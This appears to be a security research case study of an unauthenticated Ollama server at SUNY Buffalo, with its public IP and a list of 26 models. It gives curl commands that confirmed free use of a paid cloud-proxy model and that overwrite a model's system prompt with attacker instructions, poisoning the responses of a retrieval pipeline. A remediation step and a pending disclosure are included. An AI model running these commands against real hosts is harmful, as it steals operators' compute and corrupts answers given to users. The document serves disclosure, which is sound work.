Most recent
navigate open esc close Corpus index built 2026-06-07 23:58 UTC

← All engagement records

Case study May 1, 2026

SUNY Buffalo: Unauthenticated Ollama + Cloud Proxy Quota Hijack Confirmed

Sector
Universities
Country
ny

NuClide Research · 2026-05-01


Summary

State University of New York at Buffalo research compute node running 26 Ollama models including gemma4:31b-cloud, a cloud proxy model. Cloud proxy inference confirmed live, 200 OK response at operator expense. Also includes RAG pipeline components (embedding model + reranker) and a 74GB Mixtral instance. Raw Ollama port publicly accessible, no authentication.


Infrastructure

FieldValue
IP136.183.56.88
OrgSUNY Buffalo State University
CountryUS, New York
Open ports11434 (Ollama, public)

Models (26 total)

ModelSizeNotes
gemma4:31b-cloud0 GB☁️ Cloud proxy, CONFIRMED LIVE
mixtral:8x22b-instruct74 GBLocal, MoE
qwen2.5:72b-instruct44 GBLocal
llama3.1:70b39 GBLocal
qwen3.5:35b22 GBLocal
qwen2.5:32b-instruct18 GBLocal
gemma4:31b-it-q4_K_M18 GBLocal
gemma4:31B18 GBLocal
glm-4.7-flash:latest17 GBLocal (Zhipu AI)
gemma4:26B16 GBLocal
gemma4:e4B8 GBLocal
qwen3:14b8 GBLocal
phi4:latest8 GBLocal
gemma4:latest8 GBLocal
qwen2.5:14b-instruct8 GBLocal
qwen2.5vl:7b (equivalent)8 GBLocal
gemma3:27B16 GBLocal
gemma4:e2B6 GBLocal
gemma2:9b5 GBLocal
llama3.1:8b4 GBLocal
qwen2.5:7b-instruct4 GBLocal
llama3.2:3b1 GBLocal
bge-m3:latest1 GBEmbedding, RAG pipeline
smollm2:135m0 GBLocal
qllama/bge-reranker-v2-m3:latest0 GBReranker, RAG pipeline

Findings

F1: Cloud Proxy Quota Hijack (CRITICAL)

gemma4:31b-cloud returned 200 OK without any authentication:

curl http://136.183.56.88:11434/api/generate \
  -d '{"model":"gemma4:31b-cloud","prompt":"say: Buffalo","stream":false}'
# → 200 OK, response: "Buffalo", eval_count: 2

Two tokens generated at operator’s cloud API expense. No authentication, no rate limiting visible from outside.

F2: Unauthenticated RAG Pipeline Components (HIGH)

The deployment includes BGE-M3 embedding model and BGE-reranker-v2-M3, indicating an active RAG pipeline. If this Ollama instance backs a document retrieval system with university data, model injection via CVE-2025-63389 would affect all RAG-augmented responses, including content derived from indexed university documents.

# Inject into any model to affect RAG responses
curl -X POST http://136.183.56.88:11434/api/create \
  -d '{"model":"qwen3:14b","from":"qwen3:14b","system":"[attacker instructions]"}'

F3: 26-Model Unauthenticated Surface (HIGH)

26 models accessible including heavy compute (Mixtral 8x22B, Qwen2.5-72B, LLaMA3.1-70B). All injectable via CVE-2025-63389. Total local model storage: ~350+ GB.


Remediation

OLLAMA_HOST=127.0.0.1:11434
systemctl restart ollama

Disclosure

  • Discovered: 2026-05-01
  • Cloud proxy confirmed: 200 OK, 2 tokens at operator expense
  • Status: Pending outreach to SUNY Buffalo IT Security